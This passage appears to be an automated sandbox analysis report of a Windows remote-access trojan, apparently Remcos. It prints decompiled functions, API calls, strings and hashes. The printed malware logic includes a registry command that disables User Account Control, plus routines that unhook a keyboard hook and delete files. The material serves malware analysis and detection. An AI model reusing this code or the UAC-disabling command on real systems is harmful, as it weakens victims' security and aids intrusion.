                • API String ID: 2877667751-2410386613
                • Opcode ID: 2c2acc564e7228da8453ef1ef4daccb200bb255fb4852b917a0f25144a291afc
                • Instruction ID: 5840f73649b50f116e6ab49c8ddc39afef87091f1adce936c33ae781c96a4941
                • Opcode Fuzzy Hash: 2c2acc564e7228da8453ef1ef4daccb200bb255fb4852b917a0f25144a291afc
                • Instruction Fuzzy Hash: 0A01E9B190031DABDB10DF95ECC49EFBBBCEB08355F40057AF914A6240E77599058BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406DC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00406DC9() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				long _t18;

				_t18 = 0x44;
				E00435760(0,  &_v92, 0, _t18);
				_v92.cb = _t18;
				E00435760(0,  &_v20, 0, 0x10);
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}







                0x00406dd3
                0x00406ddc
                0x00406de6
                0x00406deb
                0x00406e0f
                0x00406e1e
                0x00406e2a

                APIs
                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406E0F
                • CloseHandle.KERNEL32(?), ref: 00406E1E
                • CloseHandle.KERNEL32(?), ref: 00406E23
                Strings
                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00406E05
                • C:\Windows\System32\cmd.exe, xrefs: 00406E0A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateProcess
                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                • API String ID: 2922976086-4183131282
                • Opcode ID: 0f52d4b74f975e3f2949df4035c160fbb6b8b2e0bf2a4fef78c5a914e70af107
                • Instruction ID: 771504d0c5622b635381120a699b2d9c6d8516bd8efb25c1479c62c52dadb0bd
                • Opcode Fuzzy Hash: 0f52d4b74f975e3f2949df4035c160fbb6b8b2e0bf2a4fef78c5a914e70af107
                • Instruction Fuzzy Hash: 1DF09676D0029C76CB20ABD7AC0EFDF7F3CEBC5B11F04016AB508A2041D6705010CAB5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00441C0A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00441BBB,?,?,00441B5B,?), ref: 00441C2A
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00441C3D
                • FreeLibrary.KERNEL32(00000000,?,?,?,00441BBB,?,?,00441B5B,?), ref: 00441C60
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: ea4ab4854586bb172daf74edb897d215f2c8ee4f05ba98cc7202b459c056c010
                • Instruction ID: 8f9b3e7d5fe4f03b554215b975d8d256f1185f74086fc6d013083e353006690b
                • Opcode Fuzzy Hash: ea4ab4854586bb172daf74edb897d215f2c8ee4f05ba98cc7202b459c056c010
                • Instruction Fuzzy Hash: 79F06830944318FBDB115F54EC49B9EBFB8EF04756F004175FC05A2261DB788E84CA98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E004050C4(void* __ecx, void* __ebp, char _a4) {
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t25;

				_t23 = __ecx;
				if( *((char*)(__ecx + 0x5c)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t26 = _t25 - 0x18;
					E00402073(_t17, _t25 - 0x18, _t21, __ebp, "KeepAlive             | Disabled");
					E00402073(_t17, _t26 - 0x18, _t21, __ebp, "!");
					E0041A04A(_t17, _t22);
				}
				 *(_t23 + 0x64) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t23 + 0x60));
				WaitForSingleObject( *(_t23 + 0x64), 0xffffffff);
				CloseHandle( *(_t23 + 0x64));
				return 1;
			}








                0x004050c5
                0x004050cb
                0x00000000
                0x0040512a
                0x004050d2
                0x004050d4
                0x004050de
                0x004050ed
                0x004050f2
                0x004050f7
                0x00405109
                0x0040510c
                0x00405117
                0x00405120
                0x00000000

                APIs
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                • String ID: KeepAlive | Disabled
                • API String ID: 2993684571-305739064
                • Opcode ID: 54ac682c0df13f07fbc8928149592847e25effe2883c6d2c4aa9bc08f146cb61
                • Instruction ID: 9fcb7412de1a371383c4be032709771db6bfe23be82c7c78edeb32f54ebeba58
                • Opcode Fuzzy Hash: 54ac682c0df13f07fbc8928149592847e25effe2883c6d2c4aa9bc08f146cb61
                • Instruction Fuzzy Hash: E8F096719087107FDB103774AD0AA6F7E98AB16315F00057FF986516E2D5B888509B9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041991B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E0041991B(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				void* _t12;
				WCHAR* _t14;
				void* _t16;
				void* _t17;

				_t18 = _t17 - 0x18;
				_t14 = __ecx;
				E00402073(_t7, _t17 - 0x18, _t11, _t16, "Alarm triggered");
				E00402073(_t7, _t18 - 0x18, _t11, _t16, "!");
				E0041A04A(_t7, _t12);
				PlaySoundW(_t14, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}










                0x0041991d
                0x00419920
                0x00419929
                0x00419938
                0x0041993d
                0x0041995b
                0x00419962
                0x0041996f

                APIs
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041994D
                • PlaySoundW.WINMM(00000000,00000000), ref: 0041995B
                • Sleep.KERNEL32(00002710), ref: 00419962
                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041996B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: PlaySound$HandleLocalModuleSleepTime
                • String ID: Alarm triggered
                • API String ID: 614609389-2816303416
                • Opcode ID: 13be5a314f47b5be99a2dc760bbc57afffc3dda2b1f88ff1863d5b7f6b116ace
                • Instruction ID: 8069d90e893f75e5c908224cd3dcb2ae2e93304f9117e242fbfb21d481eb26c4
                • Opcode Fuzzy Hash: 13be5a314f47b5be99a2dc760bbc57afffc3dda2b1f88ff1863d5b7f6b116ace
                • Instruction Fuzzy Hash: 0CE01A26A4822037A510336BBD0FD6F2D29DAC7B62B0101BFFA05661E29D98085196FB
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041B663 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                Download Yara Rule
                C-Code - Quality: 54%
                			E0041B663() {
				struct _CONSOLE_SCREEN_BUFFER_INFO _v28;
				void* _t9;
				void* _t12;

				_t9 = GetStdHandle(0xfffffff5);
				GetConsoleScreenBufferInfo(_t9,  &_v28);
				SetConsoleTextAttribute(_t9, 0xc);
				_push("\n\t ______                              \n\t(_____ \\                             \n\t _____) )_____ ____   ____ ___   ___ \n\t|  __  /| ___ |    \\ / ___) _ \\ /___)\n\t| |  \\ \\| ____| | | ( (__| |_| |___ |\n\t|_|   |_|_____)_|_|_|\\____)___/(___/ \n");
				E00406874(_t12);
				return SetConsoleTextAttribute(_t9, _v28.wAttributes & 0x0000ffff);
			}






                0x0041b673
                0x0041b67a
                0x0041b687
                0x0041b68d
                0x0041b692
                0x0041b6a5

                APIs
                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041B6F8), ref: 0041B66D
                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041B6F8), ref: 0041B67A
                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041B6F8), ref: 0041B687
                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041B6F8), ref: 0041B69A
                Strings
                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041B68D
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Console$AttributeText$BufferHandleInfoScreen
                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                • API String ID: 3024135584-2418719853
                • Opcode ID: b5101502732423ef893627347f2af24e4f93fc0e171d4abeb9243736e4473fa4
                • Instruction ID: ad478a08908ae1e8722594817e35ebd278399d2ab3723c686487d6c51551703d
                • Opcode Fuzzy Hash: b5101502732423ef893627347f2af24e4f93fc0e171d4abeb9243736e4473fa4
                • Instruction Fuzzy Hash: D0E04F62648708ABD3103FB6BC4EC6F7B7DE785623F101636FA1291293E974841086B5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040AE1C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 18threadCOMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E0040AE1C() {
				signed int _t15;

				 *0x473089 = 0;
				TerminateThread(E00409880, 0);
				if( *0x473040 != 0) {
					__eax = UnhookWindowsHookEx(__eax);
					 *0x473040 = 0;
					__eax = TerminateThread(E0040986A, 0);
				}
				_pop(0);
				_push(0);
				_t25 = DeleteFileW(E00401EE4(0x4730a0));
				_t15 = 0 | DeleteFileW(E00401EE4(0x4730a0)) != 0x00000000;
				if(E00406E2B(_t25) != 0) {
					RemoveDirectoryW(E00401EE4(0x4730b8));
				}
				return _t15;
			}




                0x0040ae25
                0x0040ae2b
                0x0040ae38
                0x0040ae3b
                0x0040ae47
                0x0040ae4d
                0x0040ae4d
                0x0040ae58
                0x0040addf
                0x0040adf2
                0x0040adfc
                0x0040ae06
                0x0040ae11
                0x0040ae11
                0x0040ae1b

                APIs
                • TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                • UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                • TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: TerminateThread$HookUnhookWindows
                • String ID: @0G$pth_unenc
                • API String ID: 3123878439-155138683
                • Opcode ID: 115079c2282a6bf9576d9e0b7d13f6b7bc05c6b49fdad65596f4409ad05b5654
                • Instruction ID: e1e5eea1f7390eadd48dce0aa84519ec7b6f9c8f196e89bb690cf3ca84e6fe29
                • Opcode Fuzzy Hash: 115079c2282a6bf9576d9e0b7d13f6b7bc05c6b49fdad65596f4409ad05b5654
                • Instruction Fuzzy Hash: 81E0EC616553809FD7106F60BC98A62775AB606B47310807AF506A62A6C73C8E44A6AF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043FC6A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 96%
                			E0043FC6A(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t106 = __edx;
				_t59 =  *0x46f00c; // 0xd60a1515
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E004390B7(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = E0043EEAD();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = E0043EEAD();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E0043EEAD())) = 0x16;
					E0043A5BB();
					goto L59;
				} else {
					L59:
					return E004338BB(_v8 ^ _t117);
				}
			}






































                0x0043fc6a
                0x0043fc72
                0x0043fc79
                0x0043fc7c
                0x0043fc80
                0x0043fc84
                0x0043fc86
                0x0043fc89
                0x0043fc8d
                0x0043fc90
                0x0043fc95
                0x0043fca4
                0x0043fcc4
                0x0043fcc9
                0x0043fcce
                0x0043fe6b
                0x0043fe74
                0x0043fea6
                0x0043feae
                0x0043feba
                0x0043feba
                0x0043febf
                0x0043fec2
                0x00000000
                0x0043feb5
                0x0043feb5
                0x0043feb5
                0x0043fec8
                0x0043fecc
                0x0043fed1
                0x0043fed1
                0x00000000
                0x0043fed8
                0x0043feae
                0x0043fe76
                0x0043fe7c
                0x0043fe94
                0x0043fe94
                0x00000000
                0x0043fe94
                0x0043fe83
                0x0043fe88
                0x0043fe8b
                0x0043fe8c
                0x0043fe92
                0x00000000
                0x00000000
                0x00000000
                0x0043fe92
                0x00000000
                0x0043fe83
                0x0043fcd4
                0x0043fcdd
                0x0043fd17
                0x0043fd90
                0x0043fd94
                0x0043fdaa
                0x0043fe5b
                0x0043fe5b
                0x0043fe60
                0x0043fe63
                0x00000000
                0x0043fdbf
                0x0043fdc1
                0x00000000
                0x00000000
                0x0043fdc7
                0x0043fdca
                0x0043fdca
                0x0043fdcd
                0x0043fdd3
                0x0043fdd7
                0x0043fdd7
                0x0043fde9
                0x0043fdef
                0x0043fdf2
                0x0043fdf6
                0x00000000
                0x00000000
                0x0043fe1b
                0x00000000
                0x00000000
                0x0043fe21
                0x0043fe23
                0x0043fe28
                0x0043fe48
                0x0043fe4b
                0x0043fe4e
                0x0043fe53
                0x00000000
                0x00000000
                0x00000000
                0x0043fe59
                0x0043fe2a
                0x0043fe2d
                0x0043fe2d
                0x0043fe31
                0x0043fe36
                0x00000000
                0x00000000
                0x0043fe3f
                0x0043fe40
                0x0043fe41
                0x0043fe46
                0x00000000
                0x00000000
                0x00000000
                0x0043fe46
                0x00000000
                0x0043fe2d
                0x00000000
                0x0043fdca
                0x0043fdaa
                0x0043fd99
                0x00000000
                0x00000000
                0x0043fd9f
                0x0043fd9f
                0x00000000
                0x0043fd9f
                0x0043fd1b
                0x0043fd41
                0x0043fd54
                0x0043fd58
                0x00000000
                0x0043fd68
                0x0043fd70
                0x0043fd76
                0x0043fd76
                0x00000000
                0x0043fd70
                0x0043fd58
                0x0043fd1d
                0x0043fd1f
                0x0043fd22
                0x0043fd27
                0x0043fd2a
                0x0043fd2a
                0x0043fd2e
                0x00000000
                0x00000000
                0x00000000
                0x0043fd2e
                0x0043fd33
                0x0043fd40
                0x0043fd40
                0x00000000
                0x0043fd33
                0x0043fce1
                0x00000000
                0x00000000
                0x0043fcec
                0x0043fcf7
                0x0043fcfa
                0x0043fcfd
                0x0043fd03
                0x00000000
                0x00000000
                0x0043fd09
                0x0043fd0c
                0x00000000
                0x00000000
                0x00000000
                0x0043fd0e
                0x00000000
                0x0043fcec
                0x0043fcab
                0x0043fcb1
                0x00000000
                0x0043fc9b
                0x0043feda
                0x0043feea
                0x0043feea

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d077a8b190852e3b7fe11e6cef96461035acd321b12386ca60cae5b871db1d14
                • Instruction ID: 060016eacbcb527956992f75cf2bc0db82b48ac299cd878c71906e1bf1d9a011
                • Opcode Fuzzy Hash: d077a8b190852e3b7fe11e6cef96461035acd321b12386ca60cae5b871db1d14
                • Instruction Fuzzy Hash: 9D71F432D002169BCF218F55C845ABFBB75EF49310F14613BE811672A2D7789D49CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004435FC Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 73%
                			E004435FC(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E00444A38(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x442dfb
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x45b570);
					_push( *0x45b42c);
					E0044353B(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x45b42c;
					while(1) {
						L2:
						_t244 = E0044E807(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x45b570);
							_push( *_t370);
							E0044353B(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x45b45c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00445002(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											E00445002( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											E00445002( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											E00445002( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											E00445002( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043A5E8();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46f00c; // 0xd60a1515
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
